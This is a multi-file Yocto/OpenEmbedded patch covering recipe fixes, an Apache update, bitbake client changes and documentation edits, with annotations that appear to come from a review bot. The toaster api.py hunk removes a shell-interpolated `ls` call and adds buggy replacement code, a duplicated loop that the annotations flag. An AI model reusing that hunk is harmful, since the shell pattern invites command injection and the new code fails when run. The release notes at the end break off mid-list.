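Review bot: SRCREV and the branch both change here while the recipe file stays poco_1.12.4.bb, so the source built under this version is no longer the revision that was shipped before. It would help to record that the new SRCREV is the release commit on the `poco-1.12.4` branch and why the previous revision on `master` was replaced, so that anyone auditing the pinned revision can match it to an upstream tag.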
diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb
index 21c36687e2..bfb0aaf5e7 100644
--- a/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb
+++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-gcovr_6.0.bb
@@ -4,7 +4,7 @@ SECTION = "devel/python"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=6542fc4ce5904ffb741ef56f8fe33452"
-SRC_URI = "git://github.com/gcovr/gcovr.git;branch=master;protocol=https"
+SRC_URI = "git://github.com/gcovr/gcovr.git;branch=main;protocol=https"
SRCREV = "1221ef62ff0de15bbeaf79e68e08a65d62c73ff4"
S = "${WORKDIR}/git"
diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb
index ec7747307d..2f94f7a6a5 100644
--- a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb
+++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja-syntax_1.7.2.bb
@@ -9,4 +9,6 @@ inherit pypi setuptools3
PYPI_PACKAGE = "ninja_syntax"
UPSTREAM_CHECK_URI = "https://pypi.python.org/pypi/ninja_syntax/"
-UPSTREAM_CHECK_REGEX = "/ninja_syntax/(?P<pver>(\d+[\.\-_]*)+)" \ No newline at end of file
+UPSTREAM_CHECK_REGEX = "/ninja_syntax/(?P<pver>(\d+[\.\-_]*)+)"
+
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb
index dd07968f03..3b9077f326 100644
--- a/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb
+++ b/meta-openembedded/meta-python/recipes-devtools/python/python3-ninja_1.11.1.bb
@@ -22,3 +22,4 @@ RDEPENDS:${PN} = " \
python3-ninja-syntax \
"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb b/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb
index b72589368d..fadcc32c24 100644
--- a/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb
+++ b/meta-openembedded/meta-python/recipes-devtools/python3-piccata/python3-piccata_2.0.3.bb
@@ -4,7 +4,7 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=e664eb75e2791c2e505e6e1c274e6d4f"
SRCREV = "218d310e3d840715b1c8e67cefd5b6d71a2d7a1a"
-SRC_URI = "git://github.com/NordicSemiconductor/piccata.git;protocol=http;branch=master"
+SRC_URI = "git://github.com/NordicSemiconductor/piccata.git;protocol=https;branch=master"
S = "${WORKDIR}/git"
diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch
deleted file mode 100644
index 9accbf18a1..0000000000
--- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2/0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 5c9257fa34335ff83f7c01581cf953111072a457 Mon Sep 17 00:00:00 2001
-From: Valeria Petrov <valeria.petrov@spinetix.com>
-Date: Tue, 18 Apr 2023 15:38:53 +0200
-Subject: [PATCH] * modules/mappers/config9.m4: Add 'server' directory to
- include path if mod_rewrite is enabled.
-
-Upstream-Status: Backport [https://svn.apache.org/viewvc?view=revision&revision=1909241]
-
----
- modules/mappers/config9.m4 | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/modules/mappers/config9.m4 b/modules/mappers/config9.m4
-index 55a97ab993..7120b729b7 100644
---- a/modules/mappers/config9.m4
-+++ b/modules/mappers/config9.m4
-@@ -14,6 +14,11 @@ APACHE_MODULE(userdir, mapping of requests to user-specific directories, , , mos
- APACHE_MODULE(alias, mapping of requests to different filesystem parts, , , yes)
- APACHE_MODULE(rewrite, rule based URL manipulation, , , most)
-
-+if test "x$enable_rewrite" != "xno"; then
-+ # mod_rewrite needs test_char.h
-+ APR_ADDTO(INCLUDES, [-I\$(top_builddir)/server])
-+fi
-+
- APR_ADDTO(INCLUDES, [-I\$(top_srcdir)/$modpath_current])
-
- APACHE_MODPATH_FINISH
---
-2.25.1
-
diff --git a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.57.bb b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb
index 00f8aaa415..e4f7e1ceb8 100644
--- a/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.57.bb
+++ b/meta-openembedded/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb
@@ -16,7 +16,6 @@ SRC_URI = "${APACHE_MIRROR}/httpd/httpd-${PV}.tar.bz2 \
file://0008-Fix-perl-install-directory-to-usr-bin.patch \
file://0009-support-apxs.in-force-destdir-to-be-empty-string.patch \
file://0001-make_exports.awk-not-expose-the-path.patch \
- file://0011-modules-mappers-config9.m4-Add-server-directory-to-i.patch \
"
SRC_URI:append:class-target = " \
@@ -28,7 +27,7 @@ SRC_URI:append:class-target = " \
"
LIC_FILES_CHKSUM = "file://LICENSE;md5=bddeddfac80b2c9a882241d008bb41c3"
-SRC_URI[sha256sum] = "dbccb84aee95e095edfbb81e5eb926ccd24e6ada55dcd83caecb262e5cf94d2a"
+SRC_URI[sha256sum] = "fa16d72a078210a54c47dd5bef2f8b9b8a01d94909a51453956b3ec6442ea4c5"
S = "${WORKDIR}/httpd-${PV}"
@@ -36,7 +35,7 @@ inherit autotools update-rc.d pkgconfig systemd update-alternatives
DEPENDS = "openssl expat pcre apr apr-util apache2-native "
-CVE_PRODUCT = "http_server"
+CVE_PRODUCT = "apache:http_server"
SSTATE_SCAN_FILES += "apxs config_vars.mk config.nice"
diff --git a/meta-raspberrypi/docs/extra-build-config.md b/meta-raspberrypi/docs/extra-build-config.md
index 5786f3ac87..dc5d33a6f3 100644
--- a/meta-raspberrypi/docs/extra-build-config.md
+++ b/meta-raspberrypi/docs/extra-build-config.md
@@ -180,7 +180,7 @@ To build an initramfs image:
- `INITRAMFS_IMAGE_BUNDLE = "1"`
- `BOOT_SPACE = "1073741"`
- `INITRAMFS_MAXSIZE = "315400"`
- - `IMAGE_FSTYPES_pn-${INITRAMFS_IMAGE} = "${INITRAMFS_FSTYPES}"`
+ - `IMAGE_FSTYPES:pn-${INITRAMFS_IMAGE} = "${INITRAMFS_FSTYPES}"`
## Including additional files in the SD card image boot partition
diff --git a/poky/bitbake/bin/bitbake-hashclient b/poky/bitbake/bin/bitbake-hashclient
index 3f265e8fa7..a02a65b937 100755
--- a/poky/bitbake/bin/bitbake-hashclient
+++ b/poky/bitbake/bin/bitbake-hashclient
@@ -56,25 +56,24 @@ def main():
nonlocal missed_hashes
nonlocal max_time
- client = hashserv.create_client(args.address)
-
- for i in range(args.requests):
- taskhash = hashlib.sha256()
- taskhash.update(args.taskhash_seed.encode('utf-8'))
- taskhash.update(str(i).encode('utf-8'))
+ with hashserv.create_client(args.address) as client:
+ for i in range(args.requests):
+ taskhash = hashlib.sha256()
+ taskhash.update(args.taskhash_seed.encode('utf-8'))
+ taskhash.update(str(i).encode('utf-8'))
- start_time = time.perf_counter()
- l = client.get_unihash(METHOD, taskhash.hexdigest())
- elapsed = time.perf_counter() - start_time
+ start_time = time.perf_counter()
+ l = client.get_unihash(METHOD, taskhash.hexdigest())
+ elapsed = time.perf_counter() - start_time
- with lock:
- if l:
- found_hashes += 1
- else:
- missed_hashes += 1
+ with lock:
+ if l:
+ found_hashes += 1
+ else:
+ missed_hashes += 1
- max_time = max(elapsed, max_time)
- pbar.update()
+ max_time = max(elapsed, max_time)
+ pbar.update()
max_time = 0
found_hashes = 0
@@ -174,9 +173,8 @@ def main():
func = getattr(args, 'func', None)
if func:
- client = hashserv.create_client(args.address)
-
- return func(args, client)
+ with hashserv.create_client(args.address) as client:
+ return func(args, client)
return 0
diff --git a/poky/bitbake/lib/bb/__init__.py b/poky/bitbake/lib/bb/__init__.py
index 3163481e56..75b66edc48 100644
--- a/poky/bitbake/lib/bb/__init__.py
+++ b/poky/bitbake/lib/bb/__init__.py
@@ -15,6 +15,13 @@ import sys
if sys.version_info < (3, 8, 0):
raise RuntimeError("Sorry, python 3.8.0 or later is required for this version of bitbake")
+if sys.version_info < (3, 10, 0):
+ # With python 3.8 and 3.9, we see errors of "libgcc_s.so.1 must be installed for pthread_cancel to work"
+ # https://stackoverflow.com/questions/64797838/libgcc-s-so-1-must-be-installed-for-pthread-cancel-to-work
+ # https://bugs.ams1.psf.io/issue42888
+ # so ensure libgcc_s is loaded early on
+ import ctypes
+ libgcc_s = ctypes.CDLL('libgcc_s.so.1')
class BBHandledException(Exception):
"""
diff --git a/poky/bitbake/lib/bb/asyncrpc/client.py b/poky/bitbake/lib/bb/asyncrpc/client.py
index fa042bbe87..dcbe7e5762 100644
--- a/poky/bitbake/lib/bb/asyncrpc/client.py
+++ b/poky/bitbake/lib/bb/asyncrpc/client.py
@@ -126,6 +126,12 @@ class AsyncClient(object):
{'ping': {}}
)
+ async def __aenter__(self):
+ return self
+
+ async def __aexit__(self, exc_type, exc_value, traceback):
+ await self.close()
+
class Client(object):
def __init__(self):
@@ -176,3 +182,10 @@ class Client(object):
if sys.version_info >= (3, 6):
self.loop.run_until_complete(self.loop.shutdown_asyncgens())
self.loop.close()
+
+ def __enter__(self):
+ return self
+
+ def __exit__(self, exc_type, exc_value, traceback):
+ self.close()
+ return False
diff --git a/poky/bitbake/lib/bb/command.py b/poky/bitbake/lib/bb/command.py
index f2ee587161..79b6c0738f 100644
--- a/poky/bitbake/lib/bb/command.py
+++ b/poky/bitbake/lib/bb/command.py
@@ -550,8 +550,8 @@ class CommandsSync:
and return a datastore object representing the environment
for the recipe.
"""
- fn = params[0]
- mc = bb.runqueue.mc_from_tid(fn)
+ virtualfn = params[0]
+ (fn, cls, mc) = bb.cache.virtualfn2realfn(virtualfn)
appends = params[1]
appendlist = params[2]
if len(params) > 3:
@@ -574,10 +574,10 @@ class CommandsSync:
if config_data:
# We have to use a different function here if we're passing in a datastore
# NOTE: we took a copy above, so we don't do it here again
- envdata = command.cooker.databuilder._parse_recipe(config_data, fn, appendfiles, mc, layername)['']
+ envdata = command.cooker.databuilder._parse_recipe(config_data, fn, appendfiles, mc, layername)[cls]
else:
# Use the standard path
- envdata = command.cooker.databuilder.parseRecipe(fn, appendfiles, layername)
+ envdata = command.cooker.databuilder.parseRecipe(virtualfn, appendfiles, layername)
idx = command.remotedatastores.store(envdata)
return DataStoreConnectionHandle(idx)
parseRecipeFile.readonly = True
diff --git a/poky/bitbake/lib/prserv/serv.py b/poky/bitbake/lib/prserv/serv.py
index c686b2065c..0db6ebc707 100644
--- a/poky/bitbake/lib/prserv/serv.py
+++ b/poky/bitbake/lib/prserv/serv.py
@@ -344,9 +344,9 @@ def auto_shutdown():
def ping(host, port):
from . import client
- conn = client.PRClient()
- conn.connect_tcp(host, port)
- return conn.ping()
+ with client.PRClient() as conn:
+ conn.connect_tcp(host, port)
+ return conn.ping()
def connect(host, port):
from . import client
diff --git a/poky/bitbake/lib/toaster/toastergui/api.py b/poky/bitbake/lib/toaster/toastergui/api.py
index b4cdc335ef..a06ffc00dc 100644
--- a/poky/bitbake/lib/toaster/toastergui/api.py
+++ b/poky/bitbake/lib/toaster/toastergui/api.py
@@ -11,7 +11,7 @@ import os
import re
import logging
import json
-import subprocess
+import glob
from collections import Counter
from orm.models import Project, ProjectTarget, Build, Layer_Version
@@ -234,13 +234,11 @@ class XhrSetDefaultImageUrl(View):
def scan_layer_content(layer,layer_version):
# if this is a local layer directory, we can immediately scan its content
- if layer.local_source_dir:
+ if os.path.isdir(layer.local_source_dir):
try:
# recipes-*/*/*.bb
- cmd = '%s %s' % ('ls', os.path.join(layer.local_source_dir,'recipes-*/*/*.bb'))
- recipes_list = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.read()
- recipes_list = recipes_list.decode("utf-8").strip()
- if recipes_list and 'No such' not in recipes_list:
+ recipes_list = glob.glob(os.path.join(layer.local_source_dir, 'recipes-*/*/*.bb'))
+ for recipe in recipes_list:
for recipe in recipes_list.split('\n'):
recipe_path = recipe[recipe.rfind('recipes-'):]
recipe_name = recipe[recipe.rfind('/')+1:].replace('.bb','')
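Review bot: The added `for recipe in recipes_list:` sits directly above the unchanged `for recipe in recipes_list.split('\n'):`, and `recipes_list` is now the list returned by glob.glob(), so `.split` raises AttributeError as soon as a layer contains at least one recipe. The `except Exception` further down only logs a warning, so the scan fails quietly. Drop the old inner loop. Also, `os.path.isdir(layer.local_source_dir)` is evaluated before the `try:` and raises TypeError when `local_source_dir` is None, a case the previous truthiness test handled; keep that guard, for example `if layer.local_source_dir and os.path.isdir(layer.local_source_dir):`. Replacing the `shell=True` call to `ls` with glob is the right direction, since the layer path is no longer interpolated into a shell command.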
@@ -260,6 +258,9 @@ def scan_layer_content(layer,layer_version):
except Exception as e:
logger.warning("ERROR:scan_layer_content: %s" % e)
+ else:
+ logger.warning("ERROR: wrong path given")
+ raise KeyError("local_source_dir")
class XhrLayer(View):
""" Delete, Get, Add and Update Layer information
diff --git a/poky/documentation/brief-yoctoprojectqs/index.rst b/poky/documentation/brief-yoctoprojectqs/index.rst
index df8d75edc2..61c5cbec36 100644
--- a/poky/documentation/brief-yoctoprojectqs/index.rst
+++ b/poky/documentation/brief-yoctoprojectqs/index.rst
@@ -251,10 +251,10 @@ an entire Linux distribution, including the toolchain, from source.
To use such mirrors, uncomment the below lines in your ``conf/local.conf``
file in the :term:`Build Directory`::
- BB_SIGNATURE_HANDLER = "OEEquivHash"
- BB_HASHSERVE = "auto"
BB_HASHSERVE_UPSTREAM = "hashserv.yocto.io:8687"
SSTATE_MIRRORS ?= "file://.* http://cdn.jsdelivr.net/yocto/sstate/all/PATH;downloadfilename=PATH"
+ BB_HASHSERVE = "auto"
+ BB_SIGNATURE_HANDLER = "OEEquivHash"
#. **Start the Build:** Continue with the following command to build an OS
image for the target, which is ``core-image-sato`` in this example:
diff --git a/poky/documentation/contributor-guide/recipe-style-guide.rst b/poky/documentation/contributor-guide/recipe-style-guide.rst
index a005aa3247..08d8fb4259 100644
--- a/poky/documentation/contributor-guide/recipe-style-guide.rst
+++ b/poky/documentation/contributor-guide/recipe-style-guide.rst
@@ -250,6 +250,18 @@ Recipes need to define both the :term:`LICENSE` and
correct string that you can substitute into the recipe file for a
subsequent build.
+License Updates
+~~~~~~~~~~~~~~~
+
+When you change the :term:`LICENSE` or :term:`LIC_FILES_CHKSUM` in the recipe
+you need to briefly explain the reason for the change via a ``License-Update:``
+tag. Often it's quite trivial, such as::
+
+ License-Update: copyright years refreshed
+
+Less often, the actual licensing terms themselves will have changed. If so, do
+try to link to upstream making/justifying that decision.
+
Tips and Guidelines for Writing Recipes
---------------------------------------
diff --git a/poky/documentation/contributor-guide/submit-changes.rst b/poky/documentation/contributor-guide/submit-changes.rst
index 53daaf901a..5a6136c8c8 100644
--- a/poky/documentation/contributor-guide/submit-changes.rst
+++ b/poky/documentation/contributor-guide/submit-changes.rst
@@ -460,7 +460,7 @@ or any layer other than :oe_git:`openembedded-core </openembedded-core/>`,
please add the appropriate prefix so that it is clear which layer the patch is intended
to be applied to::
- git send-email --subject-prefix="meta-oe][PATCH" ...
+ git format-patch --subject-prefix="meta-oe][PATCH" ...
.. note::
diff --git a/poky/documentation/dev-manual/debugging.rst b/poky/documentation/dev-manual/debugging.rst
index fea2cb30a1..bd1e716b0b 100644
--- a/poky/documentation/dev-manual/debugging.rst
+++ b/poky/documentation/dev-manual/debugging.rst
@@ -327,7 +327,7 @@ BitBake has determined by doing the following:
the task. This list also includes indirect dependencies from
variables depending on other variables, recursively::
- Task dependencies: ['PV', 'SRCREV', 'SRC_URI', 'SRC_URI[md5sum]', 'SRC_URI[sha256sum]', 'base_do_fetch']
+ Task dependencies: ['PV', 'SRCREV', 'SRC_URI', 'SRC_URI[sha256sum]', 'base_do_fetch']
.. note::
diff --git a/poky/documentation/dev-manual/layers.rst b/poky/documentation/dev-manual/layers.rst
index c65a94b4fa..b3ccf633df 100644
--- a/poky/documentation/dev-manual/layers.rst
+++ b/poky/documentation/dev-manual/layers.rst
@@ -313,7 +313,7 @@ Logo for your layer and application. The process consists of two parts:
successful compatibility registration.
#. Completion of an application acceptance form, which you can find at
- :yocto_home:`/webform/yocto-project-compatible-registration`.
+ :yocto_home:`/compatible-registration/`.
To be granted permission to use the logo, you need to satisfy the
following:
@@ -337,7 +337,7 @@ application, you can use the Yocto Project Compatibility Logo with your
layer and the application that uses your layer.
To access the form, use this link:
-:yocto_home:`/webform/yocto-project-compatible-registration`.
+:yocto_home:`/compatible-registration`.
Follow the instructions on the form to complete your application.
The application consists of the following sections:
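Review bot: This link is written as `/compatible-registration`, while the same target in the previous hunk of this file is `/compatible-registration/` with a trailing slash. Use one form in both places so the two references resolve identically.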
diff --git a/poky/documentation/dev-manual/new-recipe.rst b/poky/documentation/dev-manual/new-recipe.rst
index e741cef0e8..2c1033eb35 100644
--- a/poky/documentation/dev-manual/new-recipe.rst
+++ b/poky/documentation/dev-manual/new-recipe.rst
@@ -303,28 +303,33 @@ If your :term:`SRC_URI` statement includes URLs pointing to individual files
fetched from a remote server other than a version control system,
BitBake attempts to verify the files against checksums defined in your
recipe to ensure they have not been tampered with or otherwise modified
-since the recipe was written. Two checksums are used:
-``SRC_URI[md5sum]`` and ``SRC_URI[sha256sum]``.
+since the recipe was written. Multiple checksums are supported:
+``SRC_URI[md5sum]``, ``SRC_URI[sha1sum]``, ``SRC_URI[sha256sum]``.
+``SRC_URI[sha384sum]`` and ``SRC_URI[sha512sum]``, but only
+``SRC_URI[sha256sum]`` is commonly used.
+
+.. note::
+
+ ``SRC_URI[md5sum]`` used to also be commonly used, but it is deprecated
+ and should be replaced by ``SRC_URI[sha256sum]`` when updating existing
+ recipes.
If your :term:`SRC_URI` variable points to more than a single URL (excluding
-SCM URLs), you need to provide the ``md5`` and ``sha256`` checksums for
-each URL. For these cases, you provide a name for each URL as part of
-the :term:`SRC_URI` and then reference that name in the subsequent checksum
-statements. Here is an example combining lines from the files
-``git.inc`` and ``git_2.24.1.bb``::
+SCM URLs), you need to provide the ``sha256`` checksum for each URL. For these
+cases, you provide a name for each URL as part of the :term:`SRC_URI` and then
+reference that name in the subsequent checksum statements. Here is an example
+combining lines from the files ``git.inc`` and ``git_2.24.1.bb``::
SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages"
- SRC_URI[tarball.md5sum] = "166bde96adbbc11c8843d4f8f4f9811b"
SRC_URI[tarball.sha256sum] = "ad5334956301c86841eb1e5b1bb20884a6bad89a10a6762c958220c7cf64da02"
- SRC_URI[manpages.md5sum] = "31c2272a8979022497ba3d4202df145d"
SRC_URI[manpages.sha256sum] = "9a7ae3a093bea39770eb96ca3e5b40bff7af0b9f6123f089d7821d0e5b8e1230"
-Proper values for ``md5`` and ``sha256`` checksums might be available
+The proper value for the ``sha256`` checksum might be available together
with other signatures on the download page for the upstream source (e.g.
``md5``, ``sha1``, ``sha256``, ``GPG``, and so forth). Because the
-OpenEmbedded build system only deals with ``sha256sum`` and ``md5sum``,
+OpenEmbedded build system typically only deals with ``sha256sum``,
you should verify all the signatures you find by hand.
If no :term:`SRC_URI` checksums are specified when you attempt to build the
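Review bot: In the new checksum list, ``SRC_URI[sha256sum]`` is followed by a full stop and the next line continues with ``SRC_URI[sha384sum]``, which breaks the sentence; the full stop should be a comma. In the last changed paragraph, "typically only deals with ``sha256sum``" is still followed by "you should verify all the signatures you find by hand"; consider saying explicitly that the other signatures listed on a download page are not covered by the recipe checksum and are the ones to be verified manually.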
diff --git a/poky/documentation/dev-manual/runtime-testing.rst b/poky/documentation/dev-manual/runtime-testing.rst
index 205a96cc59..be1e8c02e5 100644
--- a/poky/documentation/dev-manual/runtime-testing.rst
+++ b/poky/documentation/dev-manual/runtime-testing.rst
@@ -453,7 +453,7 @@ layer's ``layer.conf`` file as normal). Just remember the following:
directory.
To create a new test, start by copying an existing module (e.g.
-``syslog.py`` or ``gcc.py`` are good ones to use). Test modules can use
+``oe_syslog.py`` or ``gcc.py`` are good ones to use). Test modules can use
code from ``meta/lib/oeqa/utils``, which are helper classes.
.. note::
diff --git a/poky/documentation/migration-guides/migration-2.2.rst b/poky/documentation/migration-guides/migration-2.2.rst
index 5435835102..3932792c78 100644
--- a/poky/documentation/migration-guides/migration-2.2.rst
+++ b/poky/documentation/migration-guides/migration-2.2.rst
@@ -29,7 +29,7 @@ Staging Directories in Sysroot Has Been Simplified
The way directories are staged in sysroot has been simplified and
introduces the new :term:`SYSROOT_DIRS`,
:term:`SYSROOT_DIRS_NATIVE`, and ``SYSROOT_DIRS_BLACKLIST``
-(replaced by :term:`SYSROOT_DIRS_IGNORE` in version 3.5). See the
+(replaced by :term:`SYSROOT_DIRS_IGNORE` in version 4.0). See the
:oe_lists:`v2 patch series on the OE-Core Mailing List
</pipermail/openembedded-core/2016-May/121365.html>`
for additional information.
diff --git a/poky/documentation/migration-guides/migration-3.0.rst b/poky/documentation/migration-guides/migration-3.0.rst
index 8e7a58e74d..67fcac41f7 100644
--- a/poky/documentation/migration-guides/migration-3.0.rst
+++ b/poky/documentation/migration-guides/migration-3.0.rst
@@ -150,7 +150,7 @@ XML feeds that ``cve-check-tool`` was using, supports CVSSv3 scoring,
and makes other improvements.
Additionally, the ``CVE_CHECK_CVE_WHITELIST`` variable has been replaced
-by ``CVE_CHECK_WHITELIST`` (replaced by :term:`CVE_CHECK_IGNORE` in version 3.5).
+by ``CVE_CHECK_WHITELIST`` (replaced by :term:`CVE_CHECK_IGNORE` in version 4.0).
.. _migration-3.0-bitbake-changes:
diff --git a/poky/documentation/migration-guides/migration-3.4.rst b/poky/documentation/migration-guides/migration-3.4.rst
index f50fe5ee04..a9b1057206 100644
--- a/poky/documentation/migration-guides/migration-3.4.rst
+++ b/poky/documentation/migration-guides/migration-3.4.rst
@@ -255,7 +255,7 @@ Miscellaneous
- The previously deprecated ``COMPRESS_CMD`` and
``CVE_CHECK_CVE_WHITELIST`` variables have been removed. Use
:term:`CONVERSION_CMD` and ``CVE_CHECK_WHITELIST`` (replaced by
- :term:`CVE_CHECK_IGNORE` in version 3.5) respectively
+ :term:`CVE_CHECK_IGNORE` in version 4.0) respectively
instead.
- The obsolete ``oe_machinstall`` function previously provided in the
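Review bot: in the sentence changed by the ``+`` line, the parenthetical "(replaced by :term:`CVE_CHECK_IGNORE` in version 4.0)" sits between the two replacement variables and "respectively", which makes the pairing hard to follow. Suggest splitting it into two statements: first that ``COMPRESS_CMD`` becomes :term:`CONVERSION_CMD` and ``CVE_CHECK_CVE_WHITELIST`` becomes ``CVE_CHECK_WHITELIST``, then a separate sentence that ``CVE_CHECK_WHITELIST`` was in turn replaced by :term:`CVE_CHECK_IGNORE` in version 4.0.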
diff --git a/poky/documentation/migration-guides/release-4.0.rst b/poky/documentation/migration-guides/release-4.0.rst
index adff55df10..09fb8ca049 100644
--- a/poky/documentation/migration-guides/release-4.0.rst
+++ b/poky/documentation/migration-guides/release-4.0.rst
@@ -20,3 +20,5 @@ Release 4.0 (kirkstone)
release-notes-4.0.11
release-notes-4.0.12
release-notes-4.0.13
+ release-notes-4.0.14
+ release-notes-4.0.15
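Review bot: the two new toctree entries on the ``+`` lines each need a matching document, and only ``release-notes-4.0.14.rst`` is visibly added as a new file in this part of the patch. Please confirm ``release-notes-4.0.15.rst`` is added in the same commit, and likewise the ``release-notes-4.2.4`` and ``release-notes-4.3.1`` entries added to release-4.2.rst and release-4.3.rst, so the documentation build does not reference a missing file.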
diff --git a/poky/documentation/migration-guides/release-4.2.rst b/poky/documentation/migration-guides/release-4.2.rst
index abeebcb1c8..5ef2cc6657 100644
--- a/poky/documentation/migration-guides/release-4.2.rst
+++ b/poky/documentation/migration-guides/release-4.2.rst
@@ -10,3 +10,4 @@ Release 4.2 (mickledore)
release-notes-4.2.1
release-notes-4.2.2
release-notes-4.2.3
+ release-notes-4.2.4
diff --git a/poky/documentation/migration-guides/release-4.3.rst b/poky/documentation/migration-guides/release-4.3.rst
index 92516ae8f5..5b651a2efd 100644
--- a/poky/documentation/migration-guides/release-4.3.rst
+++ b/poky/documentation/migration-guides/release-4.3.rst
@@ -7,3 +7,4 @@ Release 4.3 (nanbield)
migration-4.3
release-notes-4.3
+ release-notes-4.3.1
diff --git a/poky/documentation/migration-guides/release-notes-4.0.14.rst b/poky/documentation/migration-guides/release-notes-4.0.14.rst
new file mode 100644
index 0000000000..02253f33f7
--- /dev/null
+++ b/poky/documentation/migration-guides/release-notes-4.0.14.rst
@@ -0,0 +1,227 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+Release notes for Yocto-4.0.14 (Kirkstone)
+------------------------------------------
+
+Security Fixes in Yocto-4.0.14
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+- bind: Fix :cve:`2023-3341` and :cve:`2023-4236`
+- binutils: Fix :cve:`2022-44840`, :cve:`2022-45703`, :cve:`2022-47008`, :cve:`2022-47011`, :cve:`2022-47673`, :cve:`2022-47695`, :cve:`2022-47696` and :cve:`2022-48063`
+- cups: Fix :cve:`2023-4504`
+- curl: Fix :cve:`2023-38545` and :cve:`2023-38546`
+- gawk: Fix :cve:`2023-4156`
+- ghostscript: Fix :cve:`2023-43115`
+- glibc: Fix :cve:`2023-4806`, :cve:`2023-4813`, :cve:`2023-4911` and :cve:`2023-5156`
+- glibc: Ignore :cve:`2023-4527`
+- go: Fix :cve:`2023-24538` and :cve:`2023-39318`
+- gstreamer1.0-plugins-bad: fix :cve_mitre:`2023-40474`, :cve_mitre:`2023-40475` and :cve_mitre:`2023-40476`
+- libtiff: Fix :cve:`2022-40090` and :cve:`2023-1916`
+- libwebp: Fix :cve:`2023-5129`
+- libx11: Fix :cve:`2023-43785`, :cve:`2023-43786` and :cve:`2023-43787`
+- libxml2: Fix :cve:`2023-45322`
+- libxpm: Fix :cve:`2023-43788` and :cve:`2023-43789`
+- linux-firmware: Fix :cve:`2022-40982`, :cve:`2023-20569` and :cve:`2023-20593`
+- linux-yocto: update CVE exclusions
+- linux-yocto/5.10: Ignore :cve:`2003-1604`, :cve:`2004-0230`, :cve:`2006-3635`, :cve:`2006-5331`, :cve:`2006-6128`, :cve:`2007-4774`, :cve:`2007-6761`, :cve:`2007-6762`, :cve:`2008-7316`, :cve:`2009-2692`, :cve:`2010-0008`, :cve:`2010-3432`, :cve:`2010-4648`, :cve:`2010-5313`, :cve:`2010-5328`, :cve:`2010-5329`, :cve:`2010-5331`, :cve:`2010-5332`, :cve:`2011-4098`, :cve:`2011-4131`, :cve:`2011-4915`, :cve:`2011-5321`, :cve:`2011-5327`, :cve:`2012-0957`, :cve:`2012-2119`, :cve:`2012-2136`, :cve:`2012-2137`, :cve:`2012-2313`, :cve:`2012-2319`, :cve:`2012-2372`, :cve:`2012-2375`, :cve:`2012-2390`, :cve:`2012-2669`, :cve:`2012-2744`, :cve:`2012-2745`, :cve:`2012-3364`, :cve:`2012-3375`, :cve:`2012-3400`, :cve:`2012-3412`, :cve:`2012-3430`, :cve:`2012-3510`, :cve:`2012-3511`, :cve:`2012-3520`, :cve:`2012-3552`, :cve:`2012-4398`, :cve:`2012-4444`, :cve:`2012-4461`, :cve:`2012-4467`, :cve:`2012-4508`, :cve:`2012-4530`, :cve:`2012-4565`, :cve:`2012-5374`, :cve:`2012-5375`, :cve:`2012-5517`, :cve:`2012-6536`, :cve:`2012-6537`, :cve:`2012-6538`, :cve:`2012-6539`, :cve:`2012-6540`, :cve:`2012-6541`, :cve:`2012-6542`, :cve:`2012-6543`, :cve:`2012-6544`, :cve:`2012-6545`, :cve:`2012-6546`, :cve:`2012-6547`, :cve:`2012-6548`, :cve:`2012-6549`, :cve:`2012-6638`, :cve:`2012-6647`, :cve:`2012-6657`, :cve:`2012-6689`, :cve:`2012-6701`, :cve:`2012-6703`, :cve:`2012-6704`, :cve:`2012-6712`, :cve:`2013-0160`, :cve:`2013-0190`, :cve:`2013-0216`, :cve:`2013-0217`, :cve:`2013-0228`, :cve:`2013-0231`, :cve:`2013-0268`, :cve:`2013-0290`, :cve:`2013-0309`, :cve:`2013-0310`, :cve:`2013-0311`, :cve:`2013-0313`, :cve:`2013-0343`, :cve:`2013-0349`, :cve:`2013-0871`, :cve:`2013-0913`, :cve:`2013-0914`, :cve:`2013-1059`, :cve:`2013-1763`, :cve:`2013-1767`, :cve:`2013-1772`, :cve:`2013-1773`, :cve:`2013-1774`, :cve:`2013-1792`, :cve:`2013-1796`, :cve:`2013-1797`, :cve:`2013-1798`, :cve:`2013-1819`, :cve:`2013-1826`, :cve:`2013-1827`, :cve:`2013-1828`, 